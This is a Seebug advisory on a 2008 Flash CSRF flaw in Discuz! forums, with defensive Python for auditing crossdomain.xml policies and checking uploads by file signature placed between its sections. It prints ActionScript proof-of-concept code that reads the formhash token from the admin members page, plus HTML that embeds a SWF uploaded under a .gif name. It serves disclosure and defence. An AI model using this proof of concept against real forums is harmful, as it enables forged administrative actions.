SSV:4390
Discuz! flash csrf vul
Nov 04, 2008 - 12:00 a.m.
Root
www.seebug.org

The Discuz! security people are already aware of CSRF vulnerabilities and use a formhash token plus a Referer check to block submissions from outside the site. Anyone who has read "Bypass Preventing CSRF" [1] should realise that we can still mount a CSRF attack through Flash.

First, Discuz! 6 ships with a crossdomain.xml file by default, with the following content:

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

It allows access from any domain, so Discuz!'s formhash can be read out with ActionScript, as in the following code:

import RegExp;
var xml:XML = new XML();
xml.onData = function(s) {
tb1.text = getFirstMatch(new RegExp("<input type=\"hidden\" name=\"formhash\" value=\"(\\w+)\" />", "ig"), s, 1);
}
System.security.loadPolicyFile("http://192.168.1.102/crossdomain.xml");
xml.load("http://192.168.1.102/d.txt");
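The policy file is the root cause here: `domain="*"` lets a SWF served from any origin read the authenticated response body, token included. The following Python audit is an added example, not code from the advisory or from Discuz!; it parses a crossdomain.xml document and reports the two settings that matter for this bug, the wildcard `allow-access-from` and the absence of a `site-control` meta-policy. Both sample policies are constructed here: the permissive one reproduces the file quoted above, the hardened one uses a placeholder domain.

```python
import xml.etree.ElementTree as ET

# Constructed sample: the permissive policy quoted in the advisory (Discuz! 6 default).
PERMISSIVE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
"""

# Constructed sample of a hardened master policy. The "master-only" meta-policy
# makes Flash Player ignore policy files served from any other path, so an
# uploaded, renamed crossdomain.xml is never honoured. The domain is a placeholder.
HARDENED_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only" />
  <allow-access-from domain="static.example.invalid" secure="true" />
</cross-domain-policy>
"""


def audit_policy(policy_xml):
    """Return a list of findings for one crossdomain.xml document.

    An empty list means the policy neither grants read access to arbitrary
    origins nor leaves non-master policy files enabled.
    """
    findings = []
    root = ET.fromstring(policy_xml)
    if root.tag != "cross-domain-policy":
        return ["root element is <%s>, not <cross-domain-policy>" % root.tag]

    # 1. Meta-policy: without "master-only" (or "none"), loadPolicyFile() can
    #    point Flash Player at a policy file under any path on this host.
    site_control = root.find("site-control")
    meta = None
    if site_control is not None:
        meta = site_control.get("permitted-cross-domain-policies")
    if meta not in ("master-only", "none"):
        findings.append("no site-control meta-policy restricting policy files "
                        "to /crossdomain.xml (found %r)" % meta)

    # 2. Access rules: domain="*" lets a SWF on any site read authenticated
    #    responses, including the formhash CSRF token in the page body.
    for rule in root.findall("allow-access-from"):
        domain = rule.get("domain", "")
        if domain == "*":
            findings.append('allow-access-from domain="*" grants every origin read access')
        elif domain.startswith("*"):
            findings.append("wildcard domain %r: every subdomain can read responses" % domain)
        if rule.get("secure") == "false":
            findings.append('secure="false" on %r lets http:// SWFs read https:// responses' % domain)
    return findings


if __name__ == "__main__":
    for name, policy in (("permissive", PERMISSIVE_POLICY), ("hardened", HARDENED_POLICY)):
        print(name, audit_policy(policy) or ["ok"])
```

Run it against the live file (`GET /crossdomain.xml`) of each host you operate; the permissive sample yields exactly two findings, the hardened one none. Even with the hardened policy, a forum whose users share a session cookie should only list origins it fully controls, since any listed origin can read the logged-in user's pages.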

Anyone familiar with ActionScript security knows that Flash has patched the custom-HTTP-header hole, which means we cannot use code like the following:

.addRequestHeader("Referer: http://foo/index.php?foo", "www.80vul.com");

to forge the Referer. However, as in the exploit in SODB-2008-01, we can get around this by renaming the Flash file to a .gif extension and uploading it to the target, then invoking that gif remotely from an HTML page.

2008-03
[Deleting crossdomain.xml does not fully fix this vulnerability: the policy file can have any file name as long as loadPolicyFile() is pointed at it, so an attacker can upload a renamed crossdomain.xml through the attachment upload or similar.]
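The two upload tricks in the note above (a SWF renamed to .gif, and a policy file under an arbitrary name) share one defence: decide by file content, never by extension, because Flash Player keys on the bytes it receives rather than the name the web server stores them under. The following check is an added example, not Discuz!'s own upload code; the sample uploads are constructed inline.

```python
import xml.etree.ElementTree as ET

# Signatures of the two formats the advisory contrasts: what the upload claims
# to be (GIF) and what it may really be (SWF). ZWS is the LZMA-compressed SWF variant.
GIF_MAGIC = (b"GIF87a", b"GIF89a")
SWF_MAGIC = (b"FWS", b"CWS", b"ZWS")


def looks_like_policy_file(data):
    """True if the bytes parse as XML whose root element is <cross-domain-policy>."""
    try:
        return ET.fromstring(data).tag == "cross-domain-policy"
    except ET.ParseError:
        return False


def check_image_upload(filename, data):
    """Decide whether an upload advertised as a GIF may be stored.

    Returns (accepted, reason). Rejections name the first failed check so the
    result can be logged and, for SWF or policy content, alerted on.
    """
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext != "gif":
        return False, "extension %r not handled by this check" % ext
    head = data[:6]
    if head[:3] in SWF_MAGIC:
        return False, "SWF header %r behind a .gif name" % head[:3].decode("ascii")
    if looks_like_policy_file(data):
        return False, "content is a cross-domain policy file"
    if not head.startswith(GIF_MAGIC):
        return False, "missing GIF87a/GIF89a signature"
    return True, "ok"


# Constructed sample uploads: a real (minimal) GIF header, a renamed compressed
# SWF, a policy file under an image name, and a PNG mislabelled as GIF.
SAMPLE_UPLOADS = {
    "photo.gif": b"GIF89a\x01\x00\x01\x00\x80\x00\x00" + b"\x00" * 16,
    "poc.gif": b"CWS\x08" + b"\x00" * 32,
    "policy.gif": (b'<?xml version="1.0"?><cross-domain-policy>'
                   b'<allow-access-from domain="*"/></cross-domain-policy>'),
    "pic.gif": b"\x89PNG\r\n\x1a\n" + b"\x00" * 8,
}


if __name__ == "__main__":
    for name, data in SAMPLE_UPLOADS.items():
        print(name, check_image_upload(name, data))
```

Only `photo.gif` is accepted. As a second layer, serve attachments from a separate host that carries no session cookie and no policy file of its own, so that even a file that slips past the check cannot be loaded in the forum's origin.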


The PoC (tested against Discuz! 5.5; for other versions write your own) is as follows:

Flash source file: http://www.80vul.com/dzvul/sodb/01/sodb-2008-02.fla

The ActionScript code:

import RegExp;
System.security.loadPolicyFile("http://www.80vul.com/bbs/crossdomain.xml");

var xml:XML = new XML();
xml.onData = function(s) {
    tb1.text = getFirstMatch(new RegExp("<input type=\"hidden\" name=\"formhash\" value=\"(\\w+)\" />", "ig"), s, 1);
}
System.security.loadPolicyFile("http://www.80vul.com/bbs/crossdomain.xml");
xml.load("http://www.80vul.com/bbs/admincp.php?action=members");

function getFirstMatch(re, s, i) {
	var m = null;
	if ((m = re.exec(s)) != null) {
		return m[i];
	}
}



The HTML that invokes it remotely:

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0" width="550" height="400">
<param name="allowScriptAccess" value="sameDomain">
<param name="movie" value="http://www.80vul.com/bbs/attachments/month_0810/20081030_a293d131d2da23ead5805QYWvs5tkBpi.gif">
<param name="quality" value="high">
<param name="bgcolor" value="#ffffff">
<embed src="http://www.80vul.com/bbs/attachments/month_0810/20081030_a293d131d2da23ead5805QYWvs5tkBpi.gif" quality="high" bgcolor="#ffffff" allowscriptaccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" width="550" height="400">
</object>